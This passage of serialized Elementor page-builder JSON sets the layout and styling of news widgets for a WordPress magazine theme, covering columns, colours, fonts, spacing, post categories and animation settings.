_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-running-news\"},{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"27.961\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"12\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"11\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"0\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"44.078\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"400\",\"height\":\"510\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"0\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"27.960\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"5\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"l